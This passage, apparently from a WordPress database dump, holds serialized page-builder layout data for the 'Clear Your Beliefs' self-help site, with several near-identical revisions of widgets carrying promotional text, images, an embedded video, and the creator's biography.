Beliefs</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1054, 1554, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:206:"<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:394:"<center style="margin-top: -100px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe width="730" height="411" src="//www.youtube.com/embed/AGU_R_ZB540?rel=0" frameborder="0" allowfullscreen style="margin-top: -43px;"></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:372:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center><center style="margin-bottom: 44px;">[Form id="10"]</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:850:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: -15px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center;"><strong>DOWNLOAD THE FREE iClearIt APP</strong></p>\n\n<p style="text-align: center; font-size: 14px;">Start Clearing Whatever Is In The Way Right Now\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:723:"[su_box title="Special Program" box_color="#1a2d8c" radius="8"]\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <big><strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong></big>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong></center>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1172:"<b><em>What You Can Accomplish with Clear Your Beliefs</em></b>\n[su_row][su_column size="1/2"]\n<ul>\n	<li>Release hurt and pain from the past</li>\n	<li>Clear resistance to taking action</li>\n	<li>Open to new possibilities</li>\n	<li>Eliminate blocks to manifestation</li>\n	<li>Find your true purpose</li>\n	<li>Delete what’s been holding you back</li>\n</ul>\n[/su_column]\n[su_column size="1/2"]\n<ul style="margin-top: -20px;">\n	<li>Change your personality style</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your spiritual nature</li>\n	<li>Become less reactive, more calm</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column]\n[/su_row]\n<hr/>\n<b><em>How and Why It Works</em></b>\n<ul>\n	<li>Beliefs are the major cause of upset and unhappiness</li>\n	<li>CYB clears beliefs at the core of the psyche, where they live</li>\n	<li>All 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)</li>\n	<li>You take charge and decide what you want to believe</li>\n	<li>You’re guided gently, step-by-step, through the entire process</li>\n	<li>You decide how far to go, and what changes to make</li>\n</ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2208:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:579:"<div id="divStroke2">\n<h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 220px; margin-bottom: 0px;"><a href="http://clearyourbeliefs.com"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" style="width: 365px;" /></a></p>\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>Copyright 2014 Clear Your Beliefs</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1055, 1555, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:206:"<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:394:"<center style="margin-top: -100px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe width="730" height="411" src="//www.youtube.com/embed/AGU_R_ZB540?rel=0" frameborder="0" allowfullscreen style="margin-top: -43px;"></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:372:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center><center style="margin-bottom: 44px;">[Form id="10"]</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:850:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: -15px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center;"><strong>DOWNLOAD THE FREE iClearIt APP</strong></p>\n\n<p style="text-align: center; font-size: 14px;">Start Clearing Whatever Is In The Way Right Now\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:723:"[su_box title="Special Program" box_color="#1a2d8c" radius="8"]\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <big><strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong></big>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong></center>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1245:"<div id="divStroke2" style="padding-top: 25px; padding-bottom: 25px;">\n<b><em>What You Can Accomplish with Clear Your Beliefs</em></b>\n[su_row][su_column size="1/2"]\n<ul>\n	<li>Release hurt and pain from the past</li>\n	<li>Clear resistance to taking action</li>\n	<li>Open to new possibilities</li>\n	<li>Eliminate blocks to manifestation</li>\n	<li>Find your true purpose</li>\n	<li>Delete what’s been holding you back</li>\n</ul>\n[/su_column]\n[su_column size="1/2"]\n<ul style="margin-top: -20px;">\n	<li>Change your personality style</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your spiritual nature</li>\n	<li>Become less reactive, more calm</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column]\n[/su_row]\n\n<b><em>How and Why It Works</em></b>\n<ul>\n	<li>Beliefs are the major cause of upset and unhappiness</li>\n	<li>CYB clears beliefs at the core of the psyche, where they live</li>\n	<li>All 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)</li>\n	<li>You take charge and decide what you want to believe</li>\n	<li>You’re guided gently, step-by-step, through the entire process</li>\n	<li>You decide how far to go, and what changes to make</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2208:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:579:"<div id="divStroke2">\n<h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 220px; margin-bottom: 0px;"><a href="http://clearyourbeliefs.com"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" style="width: 365px;" /></a></p>\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>Copyright 2014 Clear Your Beliefs</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1056, 1556, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:206:"<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:394:"<center style="margin-top: -100px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe width="730" height="411" src="//www.youtube.com/embed/AGU_R_ZB540?rel=0" frameborder="0" allowfullscreen style="margin-top: -43px;"></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:372:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center><center style="margin-bottom: 44px;">[Form id="10"]</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:850:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: -15px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center;"><strong>DOWNLOAD THE FREE iClearIt APP</strong></p>\n\n<p style="text-align: center; font-size: 14px;">Start Clearing Whatever Is In The Way Right Now\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:723:"[su_box title="Special Program" box_color="#1a2d8c" radius="8"]\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <big><strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong></big>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong></center>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:1229:"<div id="divStroke2" style="padding-top: 25px; padding-bottom: 25px;"><b>What You Can Accomplish with <em>Clear Your Beliefs</em></b><br /> [su_row][su_column size="1/2"]<ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li></ul><p>[/su_column]<br /> [su_column size="1/2"]</p><ul style="margin-top: -20px;"><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul><p>[/su_column]<br /> [/su_row]</p><p><b>How and Why It Works</b></p><ul><li>Beliefs are the major cause of upset and unhappiness</li><li>CYB clears beliefs at the core of the psyche, where they live</li><li>All 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)</li><li>You take charge and decide what you want to believe</li><li>You’re guided gently, step-by-step, through the entire process</li><li>You decide how far to go, and what changes to make</li></ul></div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2208:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:579:"<div id="divStroke2">\n<h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 220px; margin-bottom: 0px;"><a href="http://clearyourbeliefs.com"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" style="width: 365px;" /></a></p>\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>Copyright 2014 Clear Your Beliefs</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
